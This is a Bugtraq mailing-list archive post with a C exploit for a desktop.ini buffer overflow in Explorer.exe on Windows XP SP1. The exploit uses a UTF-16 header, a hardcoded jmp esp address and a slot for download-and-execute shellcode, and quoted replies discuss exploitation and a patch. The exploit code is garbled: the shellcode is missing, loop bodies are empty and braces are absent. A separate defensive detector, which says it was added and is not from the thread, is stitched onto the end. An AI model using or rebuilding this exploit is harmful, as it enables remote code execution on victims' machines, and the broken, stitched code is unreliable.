Bugtraq mailing list archives

Re[2]: EXPLOIT: Buffer overflow in Explorer.exe on Windows XP SP1
From: "einstein, dhtm" <einstein_dhtm () front ru>
Date: Thu, 15 May 2003 18:45:20 +0400

hello bugtraq,

From MSDN:
DWORD GetPrivateProfileSection(
  LPCTSTR lpAppName,
  LPTSTR lpReturnedString,
  DWORD nSize,
  LPCTSTR lpFileName
);
nSize
[in] Size of the buffer pointed to by the lpReturnedString parameter, in TCHARs.
Windows 95/98/Me: The maximum buffer size is 32,767 characters.

It's a pity that even Microsoft's own programmers do not know that for
the Unicode version of the function a TCHAR turns into a WCHAR.
And we talk about using Unicode everywhere..

Here is an exploit for Windows XP Service Pack 1.
NOTE: the FFFE header, which can easily be created with Notepad, is not
a new technique. It has already been used for another vulnerability in
IE (see http://security.nnov.ru/search/news.asp?binid=1782).
NOTE: the directory "domain HELL team" has to be read-only, otherwise
it won't work.
NOTE: it's possible to exploit this bug using a network shared
resource. It looks strange, but that doesn't work for Samba shares.
P.S. Don't blame me that I didn't use argv[] for parameters. It's your
task to modify the source..

#include <fstream.h>
#include <string.h>
#include <stdio.h>
#include <windows.h>
#include <direct.h>

char shellcode[]=
//download url and exec shellcode
//doesn't have any hardcoded values
//except the base address of the program
//searches the import table for 
//LoadLibraryA, GetProcAddress and ExitProcess.
//by .einstein., dH team.

char unicode_header[] = "\xFF\xFE";
char shell_header[] = "[.ShellClassInfo]\x0d\x0a";

#define OVERFLOW_LEN 0xA1C

void main()
  char url[]="file://c:/winnt/system32/calc.exe";
 // char url[]="http://localhost/cmd.exe";;
  char eip[] = "\xcc\x59\xfb\x77"; //0x77fb59cc - WinXP SP1 ntdll.dll (jmp esp)

  char path[500]; 
  strcpy(path,"domain HELL team");

  ofstream out(path,ios::out+ios::binary);
  char zero = 0;
  for (int i=0;i<strlen(shell_header);i++)
  char pad = 'B';
  for (i=0;i<OVERFLOW_LEN;i++) out.write(&pad,1);
  char ebp[] = "1234";

  char pad0 = 1;


  char pad2 = 'C';
  for (i=0;i<12;i++) out.write(&pad,1);

  int len = sizeof(shellcode)-1+sizeof(url);
  printf("shellcode+url: %d bytes\n",len);
  if (len%2 == 1) 
    printf("it's odd, so add 1 extra byte");


domain HELL team.

ES> Hi:

-----Original Message-----
From: nesumin [mailto:nesumin () softhome net]

I could create the exploit code on my Japanese Windows XP SP1.
Perhaps, I think you can easily create the full exploit code
by the following:

* You can directly specify all overwritten data without thinking about
  the UNICODE conversion if you create the "desktop.ini" as "UTF-16".
  (Adding a BOM and encoding "[.ShellClassInfo]\x0d\x0a".)

* You can get the code area of about 0xFF4 bytes.
  (Before and after RET address)

ES> Obviously, I was playing in the ANSI world. Yes, I agree with you that the
ES> exploit code written in UTF-16 can be created with a size of about 0xFF4
ES> bytes. A piece of exploit code 0xFF4 bytes long can do a lot. So, my
ES> previous statement about limited exploitation of this buffer overflow is not
ES> accurate.

ES> It should be very easy to fix this bug. I manually modified the 800H to 400h
ES> in shell32.dll to fix it.

ES> Thanks a lot for your mention of the BOM and UTF-16. Your concept has been learnt and
ES> programmatically reproduced with GetPrivateProfileSectionW.

ES> Best regards

ES> Peter Huang
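The two points this thread turns on, that nSize is counted in TCHARs rather than bytes and that a desktop.ini can arrive as UTF-16 behind an FF FE BOM, can be checked from the defender's side. The C below is an added example, not code from the thread or from Microsoft: it counts the [.ShellClassInfo] body in TCHARs, honouring the BOM, and flags a body longer than an assumed 0x400 TCHAR threshold (the 400h the reply mentions); the desktop.ini samples it builds are constructed.

```c
#include <string.h>

/* Assumed threshold, not taken from shell32: the thread reports the fix as
   changing 800h to 400h, so a section body above 0x400 TCHARs is flagged. */
#define MAX_SECTION_TCHARS 0x400

/* One TCHAR at byte offset *pos: 2 bytes after a UTF-16LE BOM, else 1. -1 at end. */
static int next_tchar(const unsigned char *d, size_t n, size_t *pos, int utf16) {
    if (!utf16) return *pos < n ? d[(*pos)++] : -1;
    if (*pos + 2 > n) return -1;
    *pos += 2;
    return d[*pos - 2] | (d[*pos - 1] << 8);
}

/* TCHARs after the "[.ShellClassInfo]" token up to the next line starting
   with '[' or end of data; -1 if the header is absent. Counting in TCHARs
   rather than bytes is the unit nSize is specified in. */
long shellclassinfo_body_tchars(const unsigned char *d, size_t n) {
    static const char hdr[] = "[.ShellClassInfo]";
    int utf16 = n >= 2 && d[0] == 0xFF && d[1] == 0xFE;   /* FF FE BOM */
    size_t pos = utf16 ? 2 : 0, match = 0;
    long count = 0;
    int c, line_start = 0;
    while (hdr[match] != '\0' && (c = next_tchar(d, n, &pos, utf16)) != -1)
        match = (c == (unsigned char)hdr[match]) ? match + 1 : (c == '[' ? 1 : 0);
    if (hdr[match] != '\0') return -1;
    while ((c = next_tchar(d, n, &pos, utf16)) != -1 && !(line_start && c == '['))
        line_start = (c == '\n'), count++;
    return count;
}

/* Constructed sample desktop.ini in UTF-16LE: BOM, header line, `pad` 'B's,
   CRLF. Returns bytes written, or 0 if cap is too small. */
static size_t build_sample(unsigned char *out, size_t cap, size_t pad) {
    const char *text = "[.ShellClassInfo]\r\n";
    size_t pos = 0, i;
    if (cap < 2 * (1 + strlen(text) + pad + 2)) return 0;
    out[pos++] = 0xFF; out[pos++] = 0xFE;
    for (i = 0; text[i]; i++) { out[pos++] = (unsigned char)text[i]; out[pos++] = 0; }
    for (i = 0; i < pad; i++)  { out[pos++] = 'B'; out[pos++] = 0; }
    out[pos++] = '\r'; out[pos++] = 0; out[pos++] = '\n'; out[pos++] = 0;
    return pos;
}

/* Body length and verdict for a sample padded with `pad` TCHARs. */
long sample_body_tchars(size_t pad) {
    static unsigned char buf[16384];
    size_t n = build_sample(buf, sizeof buf, pad);
    return n ? shellclassinfo_body_tchars(buf, n) : -1;
}
int sample_oversized(size_t pad) { return sample_body_tchars(pad) > MAX_SECTION_TCHARS; }
```

A padding of 0xA1C, the OVERFLOW_LEN from the post, gives a body of 0xA20 TCHARs and is flagged, while an ordinary one-line section is not.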
